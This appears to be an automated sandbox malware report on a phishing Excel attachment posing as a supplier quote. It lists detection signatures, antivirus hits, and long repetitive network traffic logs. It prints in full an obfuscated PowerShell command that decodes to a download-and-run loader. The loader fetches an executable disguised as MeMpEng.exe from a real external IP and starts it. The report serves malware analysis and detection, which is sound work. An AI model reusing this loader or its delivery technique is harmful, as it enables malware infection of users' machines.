Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2L
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3880, TargetFilename: C:\Users\user\AppData\Local\Temp\fyhnokoh.gcp.ps1

    Data Obfuscation

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3880, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline", ProcessId: 3984, ProcessName: csc.exe
    Timestamp:2024-08-28T07:01:17.917438+0200
    SID:2024449
    Severity:1
    Source Port:49162
    Destination Port:80
    Protocol:TCP
    Classtype:Attempted User Privilege Gain
    Timestamp:2024-08-28T07:01:41.779866+0200
    SID:2024449
    Severity:1
    Source Port:49169
    Destination Port:80
    Protocol:TCP
    Classtype:Attempted User Privilege Gain
    Timestamp:2024-08-28T07:01:17.917487+0200
    SID:2024197
    Severity:1
    Source Port:80
    Destination Port:49162
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-08-28T07:01:19.900908+0200
    SID:2024449
    Severity:1
    Source Port:49164
    Destination Port:80
    Protocol:TCP
    Classtype:Attempted User Privilege Gain
    Timestamp:2024-08-28T07:01:19.900912+0200
    SID:2024197
    Severity:1
    Source Port:80
    Destination Port:49164
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Thermo Fisher RFQ_TFS-1805.xlsVirustotal: Detection: 20%Perma Link
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeMpEng[1].exeJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49168 version: TLS 1.2
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.pdbhP source: powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.pdb source: powershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.pdbhP source: powershell.exe, 00000007.00000002.426492015.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: .pdbptB source: powershell.exe, 00000007.00000002.429105773.000000001C2C7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.pdb source: powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C60
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_00402930 FindFirstFileW,11_2_00402930
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 11_2_004068B1 FindFirstFileW,FindClose,11_2_004068B1
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405C60
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_00402930 FindFirstFileW,20_2_00402930
    Source: C:\Users\user\AppData\Roaming\MeMpEng.exeCode function: 20_2_004068B1 FindFirstFileW,FindClose,20_2_004068B1

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
    Source: global trafficDNS query: name: zhort.de
    Source: global trafficDNS query: name: zhort.de
    Source: global trafficDNS query: name: zhort.de
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49162
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
    Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.166:80
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.3.243.166:80 -> 192.168.2.22:49164
